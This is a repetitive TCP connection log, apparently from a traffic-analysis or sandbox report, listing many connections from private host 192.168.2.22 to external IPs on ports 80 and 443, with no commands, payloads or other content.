Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80

Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
